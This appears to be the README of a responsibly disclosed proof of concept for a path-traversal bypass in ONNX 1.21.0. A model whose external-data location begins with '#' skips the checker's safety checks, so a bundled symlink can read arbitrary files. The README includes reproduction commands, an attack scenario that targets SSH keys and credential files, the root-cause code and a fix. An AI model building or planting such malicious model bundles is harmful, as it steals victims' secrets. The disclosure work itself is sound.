PoC: ONNX 1.21.0 #-prefix bypass → Arbitrary File Read

This repository contains a proof-of-concept for an unfixed path-traversal vulnerability in ONNX 1.21.0 (latest official release at time of submission).

Summary

onnx.checker and onnx.load_external_data_for_model skip all three security checks (verify_path_containment, is_regular_file, hard_link_count > 1) whenever the resolved external-data path starts with '#'. That prefix is meant to mark in-memory tensors, but the check is performed on the full resolved path (base_dir / location) instead of on the original location string. When base_dir is empty, which is exactly what onnx.load("model.onnx") produces when called with a bare filename, the resolved path equals the attacker-controlled location. A location starting with # therefore bypasses every check.

The result is an arbitrary file read via a symlink whose name starts with #, on the current latest release.
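The path arithmetic described above can be modelled in a few lines of Python. This is only an illustrative sketch, not ONNX code: skips_checks is a hypothetical helper that mimics the data_path_str[0] != '#' test by joining the model's directory with the location via os.path.join, and the C++ checker's actual joining logic may differ in detail.

```python
import os


def skips_checks(model_path: str, location: str) -> bool:
    """Hypothetical model of the prefix test applied to the joined path."""
    # A bare filename such as "model.onnx" has an empty directory component.
    base_dir = os.path.dirname(model_path)
    data_path_str = os.path.join(base_dir, location)
    return data_path_str.startswith("#")


# Bare filename: base_dir is "", so the joined path is the location itself.
print(skips_checks("model.onnx", "#hidden_link/passwd"))          # True
# Directory-qualified path: the joined path no longer starts with '#'.
print(skips_checks("/models/model.onnx", "#hidden_link/passwd"))  # False
```

In this model the checks are skipped only when the caller passes a bare filename, which matches the condition stated in the summary.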

Versions

  • Tested vulnerable: onnx==1.21.0 (latest at submission)
  • Bypasses the fix for CVE-2026-27489 (the fix introduced the data_path_str[0] != '#' check that this PoC exploits).

Files

  • poc_bundle.tar.gz: Self-contained tarball with model.onnx, a symlink #hidden_link → secret_dir, and secret_dir/passwd with a distinctive marker. A tarball is used because git and Hugging Face do not always preserve symlinks.
  • model.onnx: Same model as inside the tarball (for inspection). External-data location = "#hidden_link/passwd".
  • reproduce.py: Automated reproducer. Extracts the tarball into a temp directory and demonstrates the leak.
  • setup.sh / setup.ps1: Manual symlink creator if you prefer not to use the tarball.
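For readers who want to recreate the on-disk layout without the tarball or the shell scripts, the following is a minimal Python sketch of the same structure. It is not the contents of setup.sh; build_layout and MARKER are hypothetical names, and the marker bytes are a placeholder for whatever the bundled secret_dir/passwd actually contains. Creating symlinks on Windows may require elevated privileges or developer mode.

```python
import os
import tempfile

# Placeholder content (assumption); the file in the real bundle may differ.
MARKER = b"TOPSECRET_DATA_L"


def build_layout(root: str) -> str:
    """Create secret_dir/passwd and a '#hidden_link' symlink under root."""
    secret_dir = os.path.join(root, "secret_dir")
    os.makedirs(secret_dir, exist_ok=True)
    with open(os.path.join(secret_dir, "passwd"), "wb") as f:
        f.write(MARKER)
    link = os.path.join(root, "#hidden_link")
    # Relative target, so the layout survives being moved or archived.
    os.symlink("secret_dir", link, target_is_directory=True)
    return link


root = tempfile.mkdtemp(prefix="onnx_poc_")
link = build_layout(root)
# Reading through the symlink reaches the file inside secret_dir.
with open(os.path.join(link, "passwd"), "rb") as f:
    print(f.read())
```

The sketch only builds the directory and symlink; the model.onnx file with the "#hidden_link/passwd" location still has to come from the repository.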

Reproduction (quick)

pip install onnx==1.21.0
python reproduce.py

Expected output:

[+] extracted poc_bundle.tar.gz into /tmp/onnx_poc_xxxxxx
[!!!] LEAK: onnx.load() returned 16 bytes from the symlink target:
       b'TOPSECRET_DATA_L'

The 16 bytes are read from secret_dir/passwd via the symlink #hidden_link that the malicious model.onnx references as its external-data location. In a real attack the symlink would target /etc/passwd, ~/.ssh/id_rsa, an AWS credentials file, etc.

Manual reproduction

mkdir poc && cd poc
tar xzf <repo-path>/poc_bundle.tar.gz
python -c "
import onnx
m = onnx.load('model.onnx')
print(m.graph.initializer[0].raw_data)
"
# → b'TOPSECRET_DATA_L'

Realistic attack scenario

  1. Attacker bundles a model release as a zip/tarball containing model.onnx (with external_data.location = "#hidden_link/<target>") and a symlink #hidden_link → /etc (or ~/.ssh, or /proc/self/environ, etc.).
  2. Victim downloads the release, extracts it (preserving the symlink), and runs onnx.load("model.onnx") from the extracted directory, a typical first line in any ONNX consumer script.
  3. ONNX reads the symlink target's contents into model.graph.initializer[0].raw_data without any of the safety checks the v1.21.0 fix was supposed to provide.
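Step 2 depends on the archive carrying a symlink whose name begins with #. As a rough illustration of what such a bundle looks like from the consumer side, the sketch below uses Python's standard tarfile module to list those members before extraction. find_hash_symlinks is a hypothetical helper, the in-memory archive is a stand-in for a real release, and this is an inspection aid under those assumptions rather than a complete defense.

```python
import io
import tarfile


def find_hash_symlinks(archive: tarfile.TarFile) -> list[tuple[str, str]]:
    """Return (name, target) for symlink members whose basename starts with '#'."""
    hits = []
    for member in archive.getmembers():
        basename = member.name.rstrip("/").rsplit("/", 1)[-1]
        if member.issym() and basename.startswith("#"):
            hits.append((member.name, member.linkname))
    return hits


# Build a tiny in-memory archive that mimics the malicious bundle.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    link = tarfile.TarInfo("#hidden_link")
    link.type = tarfile.SYMTYPE
    link.linkname = "/etc"
    tar.addfile(link)

buf.seek(0)
with tarfile.open(fileobj=buf, mode="r") as tar:
    print(find_hash_symlinks(tar))  # [('#hidden_link', '/etc')]
```

Nothing is extracted here; the function only reads member metadata, so it can be run on an untrusted archive before deciding whether to unpack it.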

Root cause

onnx/checker.cc:1213-1232 (paths abbreviated):

if (data_path_str[0] != '#') {                            // bypass #1
    verify_path_containment(data_path, base_dir, ...);
}
if (data_path_str[0] != '#' && !std::filesystem::is_regular_file(data_path)) {   // bypass #2
    fail_check(...);
}
if (data_path_str[0] != '#' && std::filesystem::hard_link_count(data_path) > 1) { // bypass #3
    fail_check(...);
}

The Python helper does the right thing (onnx/model_container.py:124):

def is_in_memory_external_initializer(self, name: str) -> bool:
    return name.startswith("#")        # checks the *location*, not the resolved path

The C++ checker should do the same: check the original location string from the protobuf, not data_path_str after base_dir / location joining.

Suggested fix

const bool is_in_memory_marker = !location.empty() && location[0] == '#';
if (!is_in_memory_marker) {
    verify_path_containment(data_path, base_dir, tensor_name);
}
if (!is_in_memory_marker && !std::filesystem::is_regular_file(data_path)) {
    fail_check(...);
}
if (!is_in_memory_marker && std::filesystem::hard_link_count(data_path) > 1) {
    fail_check(...);
}

Disclosure

Reported via huntr.com (Protect AI) before public disclosure on GitHub or oss-security.
